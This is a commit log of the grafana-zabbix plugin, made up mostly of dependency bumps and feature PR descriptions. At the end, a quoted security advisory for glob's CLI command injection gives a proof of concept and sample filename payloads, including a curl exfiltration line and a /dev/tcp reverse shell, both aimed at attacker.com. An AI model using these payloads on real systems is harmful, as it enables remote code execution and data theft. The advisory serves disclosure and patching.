This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [terser-webpack-plugin](https://redirect.github.com/webpack/terser-webpack-plugin) | [`^5.3.10` → `^5.3.14`](https://renovatebot.com/diffs/npm/terser-webpack-plugin/5.3.14/5.3.16) |  |  | --- ### Release Notes <details> <summary>webpack/terser-webpack-plugin (terser-webpack-plugin)</summary> ### [`v5.3.16`](https://redirect.github.com/webpack/terser-webpack-plugin/blob/HEAD/CHANGELOG.md#5316-2025-12-11) [Compare Source](https://redirect.github.com/webpack/terser-webpack-plugin/compare/v5.3.15...v5.3.16) ### [`v5.3.15`](https://redirect.github.com/webpack/terser-webpack-plugin/blob/HEAD/CHANGELOG.md#5315-2025-12-05) [Compare Source](https://redirect.github.com/webpack/terser-webpack-plugin/compare/v5.3.14...v5.3.15) </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi42NC4xIiwidXBkYXRlZEluVmVyIjoiNDIuNjQuMSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsidXBkYXRlLXBhdGNoIl19--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> |
||
|
renovate-sh-app[bot]
|
02a323b142 |
chore(deps): update dependency semver to ^7.7.2 (#2147)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [semver](https://redirect.github.com/npm/node-semver) | [`^7.6.3` → `^7.7.2`](https://renovatebot.com/diffs/npm/semver/7.7.2/7.7.3) |  |  | --- ### Release Notes <details> <summary>npm/node-semver (semver)</summary> ### [`v7.7.3`](https://redirect.github.com/npm/node-semver/blob/HEAD/CHANGELOG.md#773-2025-10-06) [Compare Source](https://redirect.github.com/npm/node-semver/compare/v7.7.2...v7.7.3) ##### Bug Fixes - [`e37e0ca`]( |
||
|
dependabot[bot]
|
0c1f1203ea |
Bump js-yaml from 3.14.1 to 3.14.2 (#2148)
Bumps [js-yaml](https://github.com/nodeca/js-yaml) from 3.14.1 to 3.14.2. <details> <summary>Changelog</summary> <p><em>Sourced from <a href="https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md">js-yaml's changelog</a>.</em></p> <blockquote> <h2>[3.14.2] - 2025-11-15</h2> <h3>Security</h3> <ul> <li>Backported v4.1.1 fix to v3</li> </ul> <h2>[4.1.1] - 2025-11-12</h2> <h3>Security</h3> <ul> <li>Fix prototype pollution issue in yaml merge (<<) operator.</li> </ul> <h2>[4.1.0] - 2021-04-15</h2> <h3>Added</h3> <ul> <li>Types are now exported as <code>yaml.types.XXX</code>.</li> <li>Every type now has <code>options</code> property with original arguments kept as they were (see <code>yaml.types.int.options</code> as an example).</li> </ul> <h3>Changed</h3> <ul> <li><code>Schema.extend()</code> now keeps old type order in case of conflicts (e.g. Schema.extend([ a, b, c ]).extend([ b, a, d ]) is now ordered as <code>abcd</code> instead of <code>cbad</code>).</li> </ul> <h2>[4.0.0] - 2021-01-03</h2> <h3>Changed</h3> <ul> <li>Check <a href="https://github.com/nodeca/js-yaml/blob/master/migrate_v3_to_v4.md">migration guide</a> to see details for all breaking changes.</li> <li>Breaking: "unsafe" tags <code>!!js/function</code>, <code>!!js/regexp</code>, <code>!!js/undefined</code> are moved to <a href="https://github.com/nodeca/js-yaml-js-types">js-yaml-js-types</a> package.</li> <li>Breaking: removed <code>safe*</code> functions. Use <code>load</code>, <code>loadAll</code>, <code>dump</code> instead which are all now safe by default.</li> <li><code>yaml.DEFAULT_SAFE_SCHEMA</code> and <code>yaml.DEFAULT_FULL_SCHEMA</code> are removed, use <code>yaml.DEFAULT_SCHEMA</code> instead.</li> <li><code>yaml.Schema.create(schema, tags)</code> is removed, use <code>schema.extend(tags)</code> instead.</li> <li><code>!!binary</code> now always mapped to <code>Uint8Array</code> on load.</li> <li>Reduced nesting of <code>/lib</code> folder.</li> <li>Parse numbers according to YAML 1.2 instead of YAML 1.1 (<code>01234</code> is now decimal, <code>0o1234</code> is octal, <code>1:23</code> is parsed as string instead of base60).</li> <li><code>dump()</code> no longer quotes <code>:</code>, <code>[</code>, <code>]</code>, <code>(</code>, <code>)</code> except when necessary, <a href="https://redirect.github.com/nodeca/js-yaml/issues/470">#470</a>, <a href="https://redirect.github.com/nodeca/js-yaml/issues/557">#557</a>.</li> <li>Line and column in exceptions are now formatted as <code>(X:Y)</code> instead of <code>at line X, column Y</code> (also present in compact format), <a href="https://redirect.github.com/nodeca/js-yaml/issues/332">#332</a>.</li> <li>Code snippet created in exceptions now contains multiple lines with line numbers.</li> <li><code>dump()</code> now serializes <code>undefined</code> as <code>null</code> in collections and removes keys with <code>undefined</code> in mappings, <a href="https://redirect.github.com/nodeca/js-yaml/issues/571">#571</a>.</li> <li><code>dump()</code> with <code>skipInvalid=true</code> now serializes invalid items in collections as null.</li> <li>Custom tags starting with <code>!</code> are now dumped as <code>!tag</code> instead of <code>!<!tag></code>, <a href="https://redirect.github.com/nodeca/js-yaml/issues/576">#576</a>.</li> <li>Custom tags starting with <code>tag:yaml.org,2002:</code> are now shorthanded using <code>!!</code>, <a href="https://redirect.github.com/nodeca/js-yaml/issues/258">#258</a>.</li> </ul> <h3>Added</h3> <ul> <li>Added <code>.mjs</code> (es modules) support.</li> <li>Added <code>quotingType</code> and <code>forceQuotes</code> options for dumper to configure string literal style, <a href="https://redirect.github.com/nodeca/js-yaml/issues/290">#290</a>, <a href="https://redirect.github.com/nodeca/js-yaml/issues/529">#529</a>.</li> <li>Added <code>styles: { '!!null': 'empty' }</code> option for dumper (serializes <code>{ foo: null }</code> as "<code>foo: </code>"), <a href="https://redirect.github.com/nodeca/js-yaml/issues/570">#570</a>.</li> </ul> <!-- raw HTML omitted --> </blockquote> <p>... (truncated)</p> </details> <details> <summary>Commits</summary> <ul> <li><a href=" |
||
|
renovate-sh-app[bot]
|
b7a953b178 |
chore(deps): update dependency style-loader to v3.3.4 (#2151)
This PR contains the following updates:
| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[style-loader](https://redirect.github.com/webpack-contrib/style-loader)
| [`3.3.3` →
`3.3.4`](https://renovatebot.com/diffs/npm/style-loader/3.3.3/3.3.4) |
|
|
---
### Release Notes
<details>
<summary>webpack-contrib/style-loader (style-loader)</summary>
###
[`v3.3.4`](https://redirect.github.com/webpack/style-loader/releases/tag/v3.3.4)
[Compare
Source](https://redirect.github.com/webpack-contrib/style-loader/compare/v3.3.3...v3.3.4)
#####
[3.3.4](https://redirect.github.com/webpack-contrib/style-loader/compare/v3.3.3...v3.3.4)
(2024-01-09)
##### Bug Fixes
- css experiments logic
([c12e70b](
|
||
Zoltán Bedi
|
fb046e5715 |
Chore: Migrate workflows to use create-github-app-token (#2142)
- Removes dependabot.yml as renovate will update grafana-sdk for us - Migrates to `create-github-app-token` - Pin workflows - Removes is-compatible.yml I found that workflow not helping much but creating an annoyingly long comment Fixes https://github.com/grafana/oss-big-tent-squad/issues/144 |
||
|
renovate-sh-app[bot]
|
c02767b1c3 |
chore(deps): update dependency sass-loader to v13.3.3 (#2146)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [sass-loader](https://redirect.github.com/webpack/sass-loader) | [`13.3.1` -> `13.3.3`](https://renovatebot.com/diffs/npm/sass-loader/13.3.1/13.3.3) |  |  | --- ### Release Notes <details> <summary>webpack/sass-loader (sass-loader)</summary> ### [`v13.3.3`](https://redirect.github.com/webpack/sass-loader/blob/HEAD/CHANGELOG.md#1400-2024-01-15) [Compare Source](https://redirect.github.com/webpack/sass-loader/compare/v13.3.2...v13.3.3) ##### ⚠ BREAKING CHANGES - removed `fibers` support - minimum supported Node.js version is `18.12.0` ([627f55d]( |
||
|
Jocelyn Collado-Kuri
|
127367464e |
Standardization across Zabbix UI components (#2141)
## Summary Throughout Zabbix we did not have a uniform UI - some drop-down were using `Select` others `Combobox` others a custom one that we created. Some had placeholders and others did not. This PR aims to standardize our Zabbix UI across our query, variable and config editors ## Detailed summary - Migrate from `Select` to `Combobox` -> `Select` component is deprecated - Migrate from `HorizontalGroup` to `Stack` -> `HorizontalGroup` is also deprecated - Remove use of "custom" dropdown `MetricPickerMenu` in favor of `Combobox` ensuring uniformity across our drop-down and removing maintenance overhead for us down the line - Standardize placeholders across all inputs <img width="630" height="243" alt="Screenshot 2025-12-17 at 1 13 45 PM" src="https://github.com/user-attachments/assets/9382057e-b443-4474-a9c8-850086d7f3d4" /> <img width="691" height="256" alt="Screenshot 2025-12-17 at 1 14 05 PM" src="https://github.com/user-attachments/assets/a05ff2af-8603-4752-8d12-337dc381c0fd" /> ## Why To have a clean and standard UI and remove use of UI deprecated packages. ## How to test - Query Editor: - By creating a new query in a dashboard or Explore and interacting with all the different query types and drop-downs - All drop-downs should be searchable and have placeholders - Config Editor: - By going to a datasource and ensuring that the dropdown for Datasource (when DB connection is enabled) and Auth type are responsive and working as expected) Fixes: https://github.com/orgs/grafana/projects/457/views/40?pane=issue&itemId=3740545830&issue=grafana%7Coss-big-tent-squad%7C139 |
||
|
Jocelyn Collado-Kuri
|
ce4a8d3e19 |
Migrate from DatasourceAPI to DatasourceWithBackend (#2123)
This PR migrates the use of `DatasourceApi` to `DatasourceWithBackend`, with this a couple additional improvements were made: 1. Migrate to use `interpolateVariablesInQuery` everywhere instead of the custom `replaceTemplateVariables` we were using 2. Moves util functions out of `datasource.ts` and into the existing `utils.ts` <img width="1261" height="406" alt="Screenshot 2025-11-20 at 11 37 56 AM" src="https://github.com/user-attachments/assets/9e396cf2-eab0-49d1-958c-963a2e896eba" /> Now we can see the `query` calls being made to the backend: <img width="367" height="102" alt="Screenshot 2025-11-20 at 11 38 18 AM" src="https://github.com/user-attachments/assets/a5a9a337-7f19-4f7c-9d04-9d30c0216fb2" /> Tested: - By running queries from Explore and Dashboards (with and without variables) - By interacting with all the different Editors to make sure `ComboBox` was working as expected Next: Once this is merged, we will next be able to slowly move away from using the `ZabbixConnector` to make backend datasource calls. Fixes: [#131](https://github.com/orgs/grafana/projects/457/views/40?pane=issue&itemId=139450234&issue=grafana%7Coss-big-tent-squad%7C131) |
||
|
ismail simsek
|
cc492b916d |
Update react-table to v8 (#2131)
Updating react-table to v8. - Migrating the existing table to v8 - Preserving the visuals and logic What's done? - Cell components are moved under `Cells` folder - Old styles for react-table-6 is removed. - Old types are removed - All logic was preserved - Some cell components are removed for simplicity Fixes: https://github.com/grafana/oss-big-tent-squad/issues/125 |
||
|
Jocelyn Collado-Kuri
|
e073382983 |
Fix always fetch Zabbix version before issuing new requests (#2133)
Previously we were only fetching the version when the version was `0`. This generally worked, but posed some problems when customers were updating their Zabbix version, specifically when upgrading from a version < `7.2.x` to `7.2.x` or above. Before `7.2.x`, an `auth` parameter was still supported when issuing a zabbix request, this was deprecated in `6.4.x` and later removed in `7.2.x`. When a user was on a version < `7.2.x` all the outgoing requests would add this `auth` parameter. When upgrading to `7.2.x` this was a problem, because the version was not `0`, hence, not requiring getting the version again, but also because we were still building the request considering an older version and adding the `auth` parameter, when this was no longer supported. This PR removes the check for `version == 0`, though this now means that every request that goes out will check the version before hand, I think this will give us a more accurate representation of the version that needs to be used. fixes https://github.com/orgs/grafana/projects/457/views/40?pane=issue&itemId=3683181283&issue=grafana%7Coss-big-tent-squad%7C135 |
||
|
ismail simsek
|
3da36ec2bb |
Chore: Convert problems to functional component (#2125)
This is a prerequisite for ugrading the react-table to v8. - No logic change is introduced. - Update DataSourceRef imports. The old import was deprecated. |
||
|
dependabot[bot]
|
360b5172cf |
Upgrade grafana-plugin-sdk-go (deps): Bump github.com/grafana/grafana-plugin-sdk-go from 0.283.0 to 0.284.0 (#2130)
Bumps [github.com/grafana/grafana-plugin-sdk-go](https://github.com/grafana/grafana-plugin-sdk-go) from 0.283.0 to 0.284.0. <details> <summary>Release notes</summary> <p><em>Sourced from <a href="https://github.com/grafana/grafana-plugin-sdk-go/releases">github.com/grafana/grafana-plugin-sdk-go's releases</a>.</em></p> <blockquote> <h2>v0.284.0</h2> <h2>What's Changed</h2> <ul> <li>Vendor JSON schema to avoid network calls in tests by <a href="https://github.com/wbrowne"><code>@wbrowne</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1434">grafana/grafana-plugin-sdk-go#1434</a></li> <li>chore(deps): Update module golang.org/x/sys to v0.38.0 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1436">grafana/grafana-plugin-sdk-go#1436</a></li> <li>Fix: only build middleware chain once by <a href="https://github.com/njvrzm"><code>@njvrzm</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1437">grafana/grafana-plugin-sdk-go#1437</a></li> <li>chore(deps): Update GitHub Actions (major) by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1388">grafana/grafana-plugin-sdk-go#1388</a></li> </ul> <p><strong>Full Changelog</strong>: <a href="https://github.com/grafana/grafana-plugin-sdk-go/compare/v0.283.0...v0.284.0">https://github.com/grafana/grafana-plugin-sdk-go/compare/v0.283.0...v0.284.0</a></p> <h2>Compatibility</h2> <p>Note: The below are false positives. The changes are due to a change in method receiver types (<a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1437#issuecomment-3570860849">context</a>)</p> <pre><code>❯ gorelease -base v0.283.0 -version v0.284.0 <h1>github.com/grafana/grafana-plugin-sdk-go/backend</h1> <h2>incompatible changes</h2> <p>MiddlewareHandler.CallResource: removed MiddlewareHandler.CheckHealth: removed MiddlewareHandler.CollectMetrics: removed MiddlewareHandler.ConvertObjects: removed MiddlewareHandler.MutateAdmission: removed MiddlewareHandler.PublishStream: removed MiddlewareHandler.RunStream: removed MiddlewareHandler.SubscribeStream: removed MiddlewareHandler.ValidateAdmission: removed MiddlewareHandler: no longer implements AdmissionHandler</p> <h1>summary</h1> <p>v0.284.0 is a valid semantic version for this release. </code></pre></p> </blockquote> </details> <details> <summary>Commits</summary> <ul> <li><a href=" |
||
|
renovate-sh-app[bot]
|
b11f2b1902 |
chore(deps): update dependency @types/node to ^20.19.16 (#2105)
This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [@types/node](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/node) ([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/node)) | [`^20.8.7` -> `^20.19.16`](https://renovatebot.com/diffs/npm/@types%2fnode/20.19.16/20.19.25) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS4xMzguNSIsInVwZGF0ZWRJblZlciI6IjQxLjEzOC41IiwidGFyZ2V0QnJhbmNoIjoibWFpbiIsImxhYmVscyI6WyJ1cGRhdGUtcGF0Y2giXX0=--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> |
||
|
renovate-sh-app[bot]
|
f858259eaf |
chore(deps): update dependency @babel/core to ^7.28.4 (#2126)
This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [@babel/core](https://babel.dev/docs/en/next/babel-core) ([source](https://redirect.github.com/babel/babel/tree/HEAD/packages/babel-core)) | [`^7.21.4` -> `^7.28.4`](https://renovatebot.com/diffs/npm/@babel%2fcore/7.28.4/7.28.5) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | --- ### Release Notes <details> <summary>babel/babel (@​babel/core)</summary> ### [`v7.28.5`](https://redirect.github.com/babel/babel/blob/HEAD/CHANGELOG.md#v7285-2025-10-23) [Compare Source](https://redirect.github.com/babel/babel/compare/v7.28.4...v7.28.5) ##### 👓 Spec Compliance - `babel-parser` - [#​17446](https://redirect.github.com/babel/babel/pull/17446) Allow `Runtime Errors for Function Call Assignment Targets` ([@​liuxingbaoyu](https://redirect.github.com/liuxingbaoyu)) - `babel-helper-validator-identifier` - [#​17501](https://redirect.github.com/babel/babel/pull/17501) fix: update identifier to unicode 17 ([@​fisker](https://redirect.github.com/fisker)) ##### 🐛 Bug Fix - `babel-plugin-proposal-destructuring-private` - [#​17534](https://redirect.github.com/babel/babel/pull/17534) Allow mixing private destructuring and rest ([@​CO0Ki3](https://redirect.github.com/CO0Ki3)) - `babel-parser` - [#​17521](https://redirect.github.com/babel/babel/pull/17521) Improve `@babel/parser` error typing ([@​JLHwung](https://redirect.github.com/JLHwung)) - [#​17491](https://redirect.github.com/babel/babel/pull/17491) fix: improve ts-only declaration parsing ([@​JLHwung](https://redirect.github.com/JLHwung)) - `babel-plugin-proposal-discard-binding`, `babel-plugin-transform-destructuring` - [#​17519](https://redirect.github.com/babel/babel/pull/17519) fix: `rest` correctly returns plain array ([@​liuxingbaoyu](https://redirect.github.com/liuxingbaoyu)) - `babel-helper-create-class-features-plugin`, `babel-helper-member-expression-to-functions`, `babel-plugin-transform-block-scoping`, `babel-plugin-transform-optional-chaining`, `babel-traverse`, `babel-types` - [#​17503](https://redirect.github.com/babel/babel/pull/17503) Fix `JSXIdentifier` handling in `isReferencedIdentifier` ([@​JLHwung](https://redirect.github.com/JLHwung)) - `babel-traverse` - [#​17504](https://redirect.github.com/babel/babel/pull/17504) fix: ensure scope.push register in anonymous fn ([@​JLHwung](https://redirect.github.com/JLHwung)) ##### 🏠 Internal - `babel-types` - [#​17494](https://redirect.github.com/babel/babel/pull/17494) Type checking babel-types scripts ([@​JLHwung](https://redirect.github.com/JLHwung)) ##### :running\_woman: Performance - `babel-core` - [#​17490](https://redirect.github.com/babel/babel/pull/17490) Faster finding of locations in `buildCodeFrameError` ([@​liuxingbaoyu](https://redirect.github.com/liuxingbaoyu)) </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- ## Need help? You can ask for more help in the following Slack channel: #proj-renovate-self-hosted. In that channel you can also find ADR and FAQ docs in the Resources section. <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0Mi4xMi4xIiwidXBkYXRlZEluVmVyIjoiNDIuMTIuMSIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsidXBkYXRlLXBhdGNoIl19--> Signed-off-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> Co-authored-by: renovate-sh-app[bot] <219655108+renovate-sh-app[bot]@users.noreply.github.com> |
||
|
renovate-sh-app[bot]
|
46a0157d70 |
fix(deps): pin dependencies (#2104)
This PR contains the following updates: | Package | Type | Update | Change | Age | Confidence | |---|---|---|---|---|---| | [@types/react](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/react) ([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/react)) | devDependencies | pin | [`^18.2.25` -> `18.3.24`](https://renovatebot.com/diffs/npm/@types%2freact/18.3.24/18.3.24) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [react](https://react.dev/) ([source](https://redirect.github.com/facebook/react/tree/HEAD/packages/react)) | dependencies | minor | [`18.2.0` -> `18.3.1`](https://renovatebot.com/diffs/npm/react/18.2.0/18.3.1) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [react-dom](https://react.dev/) ([source](https://redirect.github.com/facebook/react/tree/HEAD/packages/react-dom)) | dependencies | minor | [`18.2.0` -> `18.3.1`](https://renovatebot.com/diffs/npm/react-dom/18.2.0/18.3.1) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | Add the preset `:preserveSemverRanges` to your config if you don't want to pin your dependencies. --- ### Release Notes <details> <summary>facebook/react (react)</summary> ### [`v18.3.1`](https://redirect.github.com/facebook/react/blob/HEAD/CHANGELOG.md#1831-April-26-2024) [Compare Source](https://redirect.github.com/facebook/react/compare/v18.3.0...v18.3.1) - Export `act` from `react` [f1338f]( |
||
|
Jocelyn Collado-Kuri
|
89ae290942 |
Move health check to the backend (#2120)
This PR moves the health check to backend only leaving in the frontend the functionality to test the dbconnector datasource. Leaving the `dbconnector.testDataSource` should be fine since the datasource types we allow for db connection with Zabbix already are backend datasources, and so their health requests would go through the backend. Verified: Clicking test and seeing a `health` request go out. IMPORTANT: While testing this in the UI, I found a bug with the config editor - whenever a change is made in the UI and tested, the changes don't take effect (i.e. disabling trends, keeps `trends` set to `true`, enabling db connection keep `dbConnectionEnabled` set to `false` and so on.). Created a separate [issue](https://github.com/orgs/grafana/projects/457/views/40?pane=issue&itemId=3627315751&issue=grafana%7Coss-big-tent-squad%7C132) to fix this Fixes https://github.com/grafana/oss-big-tent-squad/issues/124 Fixes https://github.com/grafana/grafana-zabbix/issues/2004 |
||
|
dependabot[bot]
|
631d3bdc4f |
Upgrade grafana-plugin-sdk-go (deps): Bump github.com/grafana/grafana-plugin-sdk-go from 0.281.0 to 0.283.0 (#2124)
Bumps [github.com/grafana/grafana-plugin-sdk-go](https://github.com/grafana/grafana-plugin-sdk-go) from 0.281.0 to 0.283.0. <details> <summary>Release notes</summary> <p><em>Sourced from <a href="https://github.com/grafana/grafana-plugin-sdk-go/releases">github.com/grafana/grafana-plugin-sdk-go's releases</a>.</em></p> <blockquote> <h2>v0.283.0</h2> <h2>What's Changed</h2> <ul> <li>experimental: change time-range behavior by <a href="https://github.com/gabor"><code>@gabor</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1428">grafana/grafana-plugin-sdk-go#1428</a></li> </ul> <p><strong>Full Changelog</strong>: <a href="https://github.com/grafana/grafana-plugin-sdk-go/compare/v0.282.0...v0.283.0">https://github.com/grafana/grafana-plugin-sdk-go/compare/v0.282.0...v0.283.0</a></p> <h2>Compatibility</h2> <p>We adjusted the way the experimental <code>v0alpha1.DataQuery</code> objects get serialised to JSON to be more compatible with past versions, for details see <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1428">grafana/grafana-plugin-sdk-go#1428</a></p> <pre><code>gorelease -base v0.282.0 -version v0.283.0 # summary v0.283.0 is a valid semantic version for this release. </code></pre> <h2>v0.282.0</h2> <h2>What's Changed</h2> <ul> <li>chore(deps): Update module google.golang.org/grpc to v1.76.0 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1423">grafana/grafana-plugin-sdk-go#1423</a></li> <li>chore(deps): Update Upstream packages by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1424">grafana/grafana-plugin-sdk-go#1424</a></li> <li>chore(deps): Update Upstream packages by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1425">grafana/grafana-plugin-sdk-go#1425</a></li> <li>experimental: conversion: improved tests by <a href="https://github.com/gabor"><code>@gabor</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1427">grafana/grafana-plugin-sdk-go#1427</a></li> <li>chore(deps): Update module github.com/grpc-ecosystem/go-grpc-middleware/v2 to v2.3.3 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1430">grafana/grafana-plugin-sdk-go#1430</a></li> <li>chore(deps): Update module github.com/prometheus/common to v0.67.2 by <a href="https://github.com/renovate-sh-app"><code>@renovate-sh-app</code></a>[bot] in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1431">grafana/grafana-plugin-sdk-go#1431</a></li> <li>Add debug logs to highlight provider behaviour by <a href="https://github.com/wbrowne"><code>@wbrowne</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1432">grafana/grafana-plugin-sdk-go#1432</a></li> <li>Context-aware instance manager by <a href="https://github.com/wbrowne"><code>@wbrowne</code></a> in <a href="https://redirect.github.com/grafana/grafana-plugin-sdk-go/pull/1352">grafana/grafana-plugin-sdk-go#1352</a></li> </ul> <p><strong>Full Changelog</strong>: <a href="https://github.com/grafana/grafana-plugin-sdk-go/compare/v0.281.0...v0.282.0">https://github.com/grafana/grafana-plugin-sdk-go/compare/v0.281.0...v0.282.0</a></p> <h2>Compatibility</h2> <pre><code>❯ gorelease -base v0.281.0 -version v0.282.0 <h1>github.com/grafana/grafana-plugin-sdk-go/backend</h1> <h2>compatible changes</h2> <p>(*GrafanaCfg).Diff: added</p> <h1>github.com/grafana/grafana-plugin-sdk-go/backend/instancemgmt</h1> <h2>compatible changes</h2> <p>NewInstanceManagerWrapper: added NewTTLInstanceManager: added</p> <h1>github.com/grafana/grafana-plugin-sdk-go/experimental/featuretoggles</h1> <h2>compatible changes</h2> <p>TTLInstanceManager: added</p> <h1>summary</h1> <p>v0.282.0 is a valid semantic version for this release. </code></pre></p> </blockquote> </details> <details> <summary>Commits</summary> <ul> <li><a href=" |
||
|
renovate-sh-app[bot]
|
5790b9a68d |
chore(deps): update dependency glob to v11 [security] (#2122)
This PR contains the following updates:
| Package | Change | Age | Confidence |
|---|---|---|---|
| [glob](https://redirect.github.com/isaacs/node-glob) | [`^10.2.7` ->
`^11.0.0`](https://renovatebot.com/diffs/npm/glob/10.4.5/11.1.0) |
[](https://docs.renovatebot.com/merge-confidence/)
|
[](https://docs.renovatebot.com/merge-confidence/)
|
### GitHub Vulnerability Alerts
####
[CVE-2025-64756](https://redirect.github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2)
### Summary
The glob CLI contains a command injection vulnerability in its
`-c/--cmd` option that allows arbitrary command execution when
processing files with malicious names. When `glob -c <command>
<patterns>` is used, matched filenames are passed to a shell with
`shell: true`, enabling shell metacharacters in filenames to trigger
command injection and achieve arbitrary code execution under the user or
CI account privileges.
### Details
**Root Cause:**
The vulnerability exists in `src/bin.mts:277` where the CLI collects
glob matches and executes the supplied command using `foregroundChild()`
with `shell: true`:
```javascript
stream.on('end', () => foregroundChild(cmd, matches, { shell: true }))
```
**Technical Flow:**
1. User runs `glob -c <command> <pattern>`
2. CLI finds files matching the pattern
3. Matched filenames are collected into an array
4. Command is executed with matched filenames as arguments using `shell:
true`
5. Shell interprets metacharacters in filenames as command syntax
6. Malicious filenames execute arbitrary commands
**Affected Component:**
- **CLI Only:** The vulnerability affects only the command-line
interface
- **Library Safe:** The core glob library API (`glob()`, `globSync()`,
streams/iterators) is not affected
- **Shell Dependency:** Exploitation requires shell metacharacter
support (primarily POSIX systems)
**Attack Surface:**
- Files with names containing shell metacharacters: `$()`, backticks,
`;`, `&`, `|`, etc.
- Any directory where attackers can control filenames (PR branches,
archives, user uploads)
- CI/CD pipelines using `glob -c` on untrusted content
### PoC
**Setup Malicious File:**
```bash
mkdir test_directory && cd test_directory
# Create file with command injection payload in filename
touch '$(touch injected_poc)'
```
**Trigger Vulnerability:**
```bash
# Run glob CLI with -c option
node /path/to/glob/dist/esm/bin.mjs -c echo "**/*"
```
**Result:**
- The echo command executes normally
- **Additionally:** The `$(touch injected_poc)` in the filename is
evaluated by the shell
- A new file `injected_poc` is created, proving command execution
- Any command can be injected this way with full user privileges
**Advanced Payload Examples:**
**Data Exfiltration:**
```bash
# Filename: $(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)
touch '$(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)'
```
**Reverse Shell:**
```bash
# Filename: $(bash -i >& /dev/tcp/attacker.com/4444 0>&1)
touch '$(bash -i >& /dev/tcp/attacker.com/4444 0>&1)'
```
